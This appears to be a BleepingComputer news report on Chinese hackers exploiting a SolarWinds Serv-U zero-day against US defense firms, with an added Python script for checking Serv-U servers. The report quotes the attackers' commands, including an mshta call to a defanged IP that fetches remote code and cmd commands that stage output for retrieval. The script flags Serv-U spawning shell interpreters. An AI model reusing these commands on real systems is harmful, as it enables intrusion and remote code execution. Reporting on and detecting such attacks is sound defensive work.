Hackers used SolarWinds zero-day bug to target US Defense orgs


China-based hackers are actively targeting US defense and software companies using a vulnerability in the SolarWinds Serv-U FTP server.

Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allows remote code execution when SSH is enabled.

According to SolarWinds, this vulnerability was disclosed to Microsoft, who saw a threat actor actively exploiting the vulnerability to execute commands on vulnerable customers' devices.

Tonight, Microsoft disclosed that the attacks are attributed with high confidence to a China-based threat group tracked as 'DEV-0322.'

"This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure," says a new blog post by the Microsoft Threat Intelligence Center.

This threat group targets publicly exposed Serv-U FTP servers belonging to entities in the US Defense Industrial Base Sector and software companies.

"The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements," explains a CISA document describing the DIB sector.

Attacks detected by Microsoft 365 Defender telemetry

Microsoft says they first learned of the attacks after Microsoft 365 Defender telemetry showed a normally harmless Serv-U process spawning anomalous malicious processes.

Some of the commands executed through the remote code execution vulnerability are listed below.

C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
cmd.exe /c whoami > "./Client/Common/redacted.txt"
cmd.exe /c dir > ".\Client\Common\redacted.txt"
cmd.exe /c ""C:\Windows\Temp\Serv-U.bat""
powershell.exe C:\Windows\Temp\Serv-U.bat
cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"

"We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands," Microsoft explains in their blog post.

Other commands would add a global admin user to the Serv-U FTP server configuration or launch batch files and scripts, likely to install malware on the devices for persistence and remote access.

Microsoft says Serv-U users can check whether their devices were compromised by examining the Serv-U DebugSocketLog.txt log file for exception messages.

A "C0000005; CSUSSHSocket::ProcessReceive" exception could indicate that the threat actors attempted to exploit the Serv-U server, but the exception could be shown for other reasons as well.

An example exception seen in logs is displayed below.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

Other signs that a device may have been compromised are:

- Recently created .txt files under the Client\Common\ folder.
- Serv-U spawned processes for mshta.exe, powershell.exe, cmd.exe, and processes running from C:\Windows\temp.
- Unrecognized global users in the Serv-U configuration.
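The three checks Microsoft describes (the DebugSocketLog.txt exception, Serv-U spawning interpreters or binaries from C:\Windows\Temp, and unrecognized global users) as an added triage script, not code from Microsoft, SolarWinds or the article. The log lines around the quoted exception, the process-creation events, the Serv-U install path and the service image name Serv-U.exe are all constructed assumptions for illustration.

```python
import ntpath
import re

# Constructed sample of a Serv-U DebugSocketLog.txt: the EXCEPTION line is the one
# quoted in the article; the lines around it are made up and not real Serv-U output.
SAMPLE_LOG = """\
Thu 15Jul21 10:02:11 - (000002) Connected to 192.0.2.10 on port 22
EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5
Thu 15Jul21 10:02:12 - (000002) Session closed
"""

# Access violation in the SSH receive path that Microsoft names as a possible exploitation attempt.
EXCEPTION_RE = re.compile(r"EXCEPTION:\s*C0000005;\s*CSUSSHSocket::ProcessReceive\(\)")

def find_ssh_exceptions(log_text):
    """Return (line number, line) for each matching exception. A hit is a lead, not a
    verdict: the article notes the exception can appear for other reasons too."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if EXCEPTION_RE.search(line)]

# Child images the report saw Serv-U spawn, plus anything launched from C:\Windows\Temp.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe"}
TEMP_DIR = "c:\\windows\\temp\\"

def is_suspicious_spawn(parent_image, child_image, serv_u_image="serv-u.exe"):
    """True when the Serv-U service process (image name assumed to be Serv-U.exe)
    starts one of the interpreters above or an executable under C:\\Windows\\Temp."""
    if ntpath.basename(parent_image).lower() != serv_u_image:
        return False
    child = child_image.lower()
    return ntpath.basename(child) in SUSPICIOUS_CHILDREN or child.startswith(TEMP_DIR)

def unknown_global_users(configured, approved):
    """Serv-U global users that are not on the administrator's approved list."""
    return sorted(set(configured) - set(approved))

if __name__ == "__main__":
    for n, line in find_ssh_exceptions(SAMPLE_LOG):
        print(f"DebugSocketLog.txt line {n}: {line[:60]}...")
    # Constructed process-creation events as (parent image, child image); the install path is assumed.
    events = [
        (r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe", r"C:\Windows\System32\mshta.exe"),
        (r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe", r"C:\Windows\Temp\Serv-U.bat"),
        (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe"),
    ]
    for parent, child in events:
        print("SUSPICIOUS" if is_suspicious_spawn(parent, child) else "ok", child)
    print(unknown_global_users(["backup", "svc_ftp", "admin2"], ["backup", "svc_ftp"]))
```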

BleepingComputer has reached out to Microsoft to learn more about what commands or malware were executed by the batch file and scripts but has not heard back.
